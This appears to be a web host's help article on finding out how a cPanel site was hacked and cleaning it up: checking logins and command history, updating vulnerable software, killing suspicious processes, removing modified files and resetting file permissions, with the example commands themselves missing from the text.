Determining the cause
The first step to securing your web site and getting back to normal operation is determining how it was hacked. In general, most hacks occur for one of the following reasons:- Your FTP/SSH password has been compromised.
- File permissions for files or directories in the public_html directory are too permissive.
- There is a software application installed on your web site that contains a vulnerability. The vulnerability is being exploited to run arbitrary code on the server.
Looking for FTP/SSH password compromises
You should first try to determine if someone has compromised your password and logged in to your account. To do this, follow these steps:- Log in to your account using SSH.
-
At the command prompt, type the following command:
This command displays the last 1000 commands run on the account, as well as when. Review recent entries in the list for any commands that seem suspicious or that you did not type.This method is not 100% fool-proof, because the command history can be altered or forged by a malicious actor.
-
At the command prompt, type the following command:
This command displays the IP address of the last user who logged in to your cPanel account. This information is also available from the cPanel home page. To see what your own IP address is, visit http://ipfinder.us.
- Change your account password in cPanel immediately. For information about how to do this, please see this article.
- Stop using FTP. Regular FTP transmits your password over the Internet in unencrypted plaintext and is easily intercepted. Use SFTP or SSH instead.
- Verify that you are running up-to-date virus and malware protection on any computers you have used to access your account.
Looking for software vulnerabilities
Out-of-date software applications often contain well-known security vulnerabilities that malicious actors can exploit using automated scripts. Software applications include anything you have installed using Softaculous, as well as any packages that you have installed manually. Usually these are applications such as blogs, image galleries, forums, shopping carts, content management systems, etc. You should review all of the software applications that are installed on your web site. Make sure you have installed the most recent version and all updates. When you update software applications, make sure you check the plugins as well. If you have any non-standard plugins installed with your applications, do a web search for the plugin name and the term “vulnerability” to see if there are any known issues with your version. If you discover any known vulnerabilities, either update the plugin or disable it. You should also check for recent errors on your web site by using cPanel’s Error Log feature. Error messages can help you determine which software applications or files are vulnerable. After you have updated your software applications and plugins, go to the Cleaning up after a hack section below.Cleaning up after a hack
After you have secured your web site, the next step is to clean up the mess left behind by the perpetrators and restore normal operation.Stopping malicious processes
The first step in the cleanup process is to ensure there are no malicious processes still running on your account. Otherwise, you may go through all of the following cleanup steps, and these processes will wreak havoc in your account all over again. To view the user processes running on your account, follow these steps:- Log into your account using SSH.
-
At the command prompt, type the following command:
-
Examine the list of running processes and look for anything suspicious. If you do see a suspicious process, note the process ID (PID) number.
Because you ran the ps command in step 2 yourself, it is not a malicious process and should not be terminated! For example:
These two processes are normal.
-
To kill any suspicious processes that you found, type the following command for each process. Replace process_id with the process ID (PID) that you noted in step 3:
Removing hacked files
You should go through all of the files in your account and delete anything that you did not put there. If you are using an FTP client, make sure it is set to show hidden files. Similarly, if you are using the command line in SSH, make sure you use the -a option with the ls command so it shows all files. (Many malicious files try to “hide” from casual observation by making themselves hidden.) Although we recommend going through all of your files, you can prioritize your search. Look first for file modification timestamps that have changed since you last modified your site, or that occurred around the time the hack took place. If you identify a file that was modified during the hack (such as a defaced index page), you may be able to locate other affected files by searching for similar timestamps. For example, to find all of the files that have been modified in your public_html directory within the last three days, follow these steps:- Log in to your account using SSH.
-
At the command prompt, type the following commands:
You can modify the -3 option to control how many days in the past the find command searches for modified files. For example, to search back five days instead of three, use -5.
Setting correct file permissions
By default, every directory beneath the public_html directory should have its file permissions set to 755 (full access for the owner, and read and execute access for everyone else). Additionally, every file should have its permissions set to 644 (read and write access for the owner, and read access for everyone else). To set these permissions for your account, follow these steps:- Log in to your account using SSH.
-
At the command prompt, type the following commands:
After you make these changes, you may need to adjust permissions for a few individual files, depending on the applications you have installed. Nevertheless, it is a good security practice to set secure permissions initially, and then make any individual adjustments as necessary.